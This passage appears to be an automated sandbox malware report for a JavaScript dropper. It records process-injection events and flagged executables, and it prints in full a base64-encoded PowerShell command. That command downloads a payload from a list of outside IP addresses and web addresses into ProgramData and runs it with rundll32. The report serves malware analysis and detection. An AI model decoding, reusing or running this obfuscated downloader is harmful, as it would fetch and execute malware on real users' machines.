EEAYwBBAEIANQBBAEgASQBBAGIAdwBCAHQAQQBHAFUAQQBkAEEAQgBsAEEASABJAEEATABnAEIAeQBBAEcAawBBAGMAdwBCAHoAQQBHADgAQQBZAFEAQgBRAEEARwBFAEEAYgBnAEIAdgBBAEgAQQBBAGQAQQBCAHAAQQBHAE0AQQBiAHcAQgB1AEEAQwB3AEEAWQBnAEIAcABBAEcANABBAFoAQQBBADcAQQBBAD0APQAiADsAJABTAHUAcABlAHIAYQBjAHQAaQB2AGkAdAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAZABnAEIAcABBAEgASQBBAGQAUQBCAHMAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAaQBBAEcAVQBBAGQAQQBBAD0AYwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBrAEEAZABBAEIAcABBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgBKAEEARwAwAEEAWQBnAEIAMQBBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBZAHcAQgBvAEEARwA4AEEAYgB3AEIAcwBBAEEAPQA9AGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQB3AEEAdQBBAEQARQBBAE8AQQBBADUAQQBDADQAQQBPAEEAQQA0AEEAQwA0AEEATQBnAEEAeQBBAEQAVQBBAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAGcAQQB3AEEARABFAEEATABnAEEAeABBAEQAawBBAE0AdwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7AH0AfQA="
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABXAGgAaQBtAG0AZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQBMAGcAQQB5AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AUQBBAHcAQQBBAD0APQAiADsAJABoAHkAcABlAHIAbwB2AGEAcgBpAHMAbQBNAGUAdABvAHgAZQBuAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATgBnAEEAdQBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBNAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE0AUQBBAHYAQQBHAEkAQQBaAGcAQQAwAEEARgBZAEEAWQBRAEEAdgBBAEYAUQBBAE0AZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAUQBBAEwAZwBBAHgAQQBEAGcAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AQQBBADMAQQBDADgAQQBVAFEAQgBWAEEAQwA4AEEATQBnAEIAdgBBAEgAVQBBAFUAZwBBAD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBPAFEAQQB1AEEARABjAEEATQB3AEEAdQBBAEQASQBBAE0AZwBBADIAQQBDADgAQQBaAGcAQgBYAEEARwA4AEEAWgBBAEEAdgBBAEcAYwBBAGEAdwBBADEAQQBHAGMAQQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABFAEEATABnAEEAeABBAEQAQQBBAE0AQQBBAHUAQQBEAGMAQQBOAGcAQQB1AEEARABJAEEATQB3AEEAeQBBAEMAOABBAFoAQQBCAFUAQQBHAEUAQQBkAFEAQgBwAEEAQwA4AEEAUgB3AEEAPQB1AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEAdwBBAEQAUQBBAEwAdwBCAFUAQQBFAHcAQQBSAHcAQgBvAEEARQA0AEEAWgBBAEEAdgBBAEcAcwBBAFoAdwBCAFcAQQBHAE0AQQBiAEEAQgByAEEAQQA9AD0AdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAEgAQQBIAGMAQQBXAGcAQgA1AEEARABZAEEAdQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBHAFUAQQBVAHcAQQB4AEEARQA0AEEATgBBAEIATwBBAEgAbwBBACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEgAYQB6AGEAcgBkAHIAeQBTAHUAYgBhAHIAcgBoAGEAdABpAG8AbgAgAGkAbgAgACQAaAB5AHAAZQByAG8AdgBhAHIAaQBzAG0ATQBlAHQAbwB4AGUAbgBvAHUAcwAgAC0AcwBwAGwAaQB0ACAAIgB1AGEAIgApACAAewB0AHIAeQAgAHsAJAB1AG4AdABoAGkAbgBrAHMAUwB1AG4AZABhAHIAaQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAZwBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHoAQQBEAGsAQQAiADsAJABJAG0AbQBpAG4AdQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEARwA0AEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAE0AQQBkAEEAQgA1AEEARwB3AEEAWgBRAEEAPQBpAEsAVABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQB5AEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAHcAQQB1AEEARABFAEEATQBRAEEAdwBBAEEAPQA9AGkASwBUAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAcABBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBkAGcAQgBsAEEASABJAEEAZABBAEIAbABBAEcASQBBAGMAZwBCAGgAQQBGAE0AQQBiAFEAQgBoAEEARwBNAEEAYQB3AEIAbABBAEgASQBBAGMAdwBBAHUAQQBHAGsAQQBjAGcAQgBwAEEASABNAEEAYQBBAEEAPQAiADsAJABWAGEAcgBpAGEAbgB0AHMAVABvAGcAZwBlAHIAaQBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQASABhAHoAYQByAGQAcgB5AFMAdQBiAGEAcgByAGgAYQB0AGkAbwBuACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAVgBhAHIAaQBhAG4AdABzAFQAbwBnAGcAZQByAGkAZQBzACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGUAbABlAGMAdAByAG8AcAB5AHIAbwBtAGUAdABlAHIALgByAGkAcwBzAG8AYQBQAGEAbgBvAHAAdABpAGMAbwBuADsAJABMAGUAZwBhAGwAaQBzAG0AQwBvAG0AcABlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBOAHcAQQAwAEEAQwA0AEEATQBRAEEAMABBAEQAVQBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9AE8ASABWAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHoAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBADAAQQBBAD0APQBPAEgAVgBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEcATQBBAGEAUQBCAGgAQQBIAE0AQQBZAHcAQgB2AEEASABBAEEAZQBRAEEAdQBBAEgAUQBBAFoAUQBCAHUAQQBHADQAQQBhAFEAQgB6AEEAQQA9AD0ATwBIAFYAbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEgAQQBHAHcAQQBhAFEAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBVAEEASABVAEEAWQBnAEIAbABBAEgASQBBAGEAUQBCADYAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAdQBBAEcAawBBAGIAZwBCAGsAQQBIAFUAQQBjAHcAQgAwAEEASABJAEEAYQBRAEIAbABBAEgATQBBACIAOwAkAG4AdQB0AHIAaQBsAGkAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBFAEEAWgB3AEIAcwBBAEcAawBBAFkAUQBCAHkAQQBHAGsAQQBiAGcAQgBwAEEARgBBAEEAYwB3AEIAbABBAEgAVQBBAFoAQQBCAHYAQQBHAGsAQQBjAHcAQgB2AEEASABRAEEAYwBnAEIAdgBBAEgAQQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgB1AEEASABRAEEAcQBCAFUAUgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBNAEEAQQB1AEEARABFAEEATgBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGcAQQBMAGcAQQB4AEEARABjAEEATQBRAEEAPQBxAEIAVQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEgAawBBAGMAdwBCADAAQQBHAGsAQQBZAHcAQgBoAEEARwB3AEEAYgBBAEIANQBBAEYAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgBvAEEASABVAEEAYgBRAEIAaABBAEcANABBAFkAdwBCAGwAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZQBsAGUAYwB0AHIAbwBwAHkAcgBvAG0AZQB0AGUAcgAuAHIAaQBzAHMAbwBhAFAAYQBuAG8AcAB0AGkAYwBvAG4AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADMAMAAxADAANQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEIAYwBBAEcAVQBBAGIAQQBCAGwAQQBHAE0AQQBkAEEAQgB5AEEARwA4AEEAYwBBAEIANQBBAEgASQBBAGIAdwBCAHQAQQBHAFUAQQBkAEEAQgBsAEEASABJAEEATABnAEIAeQBBAEcAawBBAGMAdwBCAHoAQQBHADgAQQBZAFEAQgBRAEEARwBFAEEAYgBnAEIAdgBBAEgAQQBBAGQAQQBCAHAAQQBHAE0AQQBiAHcAQgB1AEEAQwB3AEEAWQBnAEIAcABBAEcANABBAFoAQQBBADcAQQBBAD0APQAiADsAJABTAHUAcABlAHIAYQBjAHQAaQB2AGkAdAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAZABnAEIAcABBAEgASQBBAGQAUQBCAHMAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAaQBBAEcAVQBBAGQAQQBBAD0AYwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBiAHcAQgB3AEEARwBrAEEAZABBAEIAcABBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgBKAEEARwAwAEEAWQBnAEIAMQBBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBZAHcAQgBvAEEARwA4AEEAYgB3AEIAcwBBAEEAPQA9AGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQB3AEEAdQBBAEQARQBBAE8AQQBBADUAQQBDADQAQQBPAEEAQQA0AEEAQwA0AEEATQBnAEEAeQBBAEQAVQBBAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAGcAQQB3AEEARABFAEEATABnAEEAeABBAEQAawBBAE0AdwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7AH0AfQA="

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3044 resumed a thread in remote process 1228
Process injection	Process 1228 resumed a thread in remote process 240
NtResumeThread May 25, 2023, 11:04 a.m.	thread_handle: 0x00000340 suspend_count: 1 process_identifier: 1228	1	0	0
NtResumeThread May 25, 2023, 11:05 a.m.	thread_handle: 0x000002dc suspend_count: 1 process_identifier: 240	1	0	0

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

GuessableInapti.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All